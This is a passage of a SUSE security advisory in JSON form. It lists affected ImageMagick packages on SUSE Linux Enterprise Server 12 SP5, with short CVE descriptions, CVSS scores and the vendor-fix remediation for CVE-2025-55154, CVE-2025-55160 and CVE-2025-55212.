"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55154",
"url": "https://www.suse.com/security/cve/CVE-2025-55154"
},
{
"category": "external",
"summary": "SUSE Bug 1248078 for CVE-2025-55154",
"url": "https://bugzilla.suse.com/1248078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T17:58:50Z",
"details": "important"
}
],
"title": "CVE-2025-55154"
},
{
"cve": "CVE-2025-55160",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55160"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-27 and 7.1.2-1, there is undefined behavior (function-type-mismatch) in splay tree cloning callback. This results in a deterministic abort under UBSan (DoS in sanitizer builds), with no crash in a non-sanitized build. This issue has been patched in versions 6.9.13-27 and 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55160",
"url": "https://www.suse.com/security/cve/CVE-2025-55160"
},
{
"category": "external",
"summary": "SUSE Bug 1248079 for CVE-2025-55160",
"url": "https://bugzilla.suse.com/1248079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T17:58:50Z",
"details": "moderate"
}
],
"title": "CVE-2025-55160"
},
{
"cve": "CVE-2025-55212",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55212"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2, passing a geometry string containing only a colon (\":\") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55212",
"url": "https://www.suse.com/security/cve/CVE-2025-55212"
},
{
"category": "external",
"summary": "SUSE Bug 1248767 for CVE-2025-55212",
"url": "https://bugzilla.suse.com/1248767"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
